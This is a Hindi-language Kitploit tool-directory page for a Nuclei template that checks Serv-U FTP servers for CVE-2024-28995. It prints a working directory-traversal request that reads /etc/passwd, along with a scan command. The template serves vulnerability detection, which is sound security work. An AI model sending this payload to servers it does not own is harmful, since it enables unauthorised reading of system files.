Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-28995-Nuclei-Template — Nuclei टेम्पलेट CVE-2024-28995 का पता लगाने के लिए, जो Serv-U FTP सर्वर में एक डायरेक्टरी ट्रैवर्सल भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से फ़ाइल पढ़ने में सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
भेद्यता स्कैनरवेब भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Nuclei टेम्पलेट CVE-2024-28995 का पता लगाने के लिए, जो Serv-U FTP सर्वर में एक डायरेक्टरी ट्रैवर्सल भेद्यता है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से फ़ाइल पढ़ने में सक्षम बनाती है।

रिपॉजिटरी देखें
142 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-28995 Nuclei टेम्पलेट

Serv-U के संस्करण 15.4.2 और उससे नीचे में डायरेक्टरी ट्रैवर्सल भेद्यता की जाँच करता है, जो /etc/passwd जैसी संवेदनशील फ़ाइलों को पढ़ने की अनुमति देता है।

टेम्पलेट विवरण

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



उपयोग

इस टेम्पलेट का Nuclei के साथ उपयोग करने के लिए, टेम्पलेट सामग्री को CVE-2024-28995.yaml नामक फ़ाइल में सहेजें और निम्न कमांड चलाएँ:

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

<target-url> को उस लक्ष्य के URL से बदलें जिसे आप स्कैन करना चाहते हैं।

संपर्क

किसी भी पूछताछ या अधिक जानकारी के लिए, आप मुझसे इन माध्यमों से संपर्क कर सकते हैं:

  • LinkedIn
  • Twitter
टूल डाउनलोड करें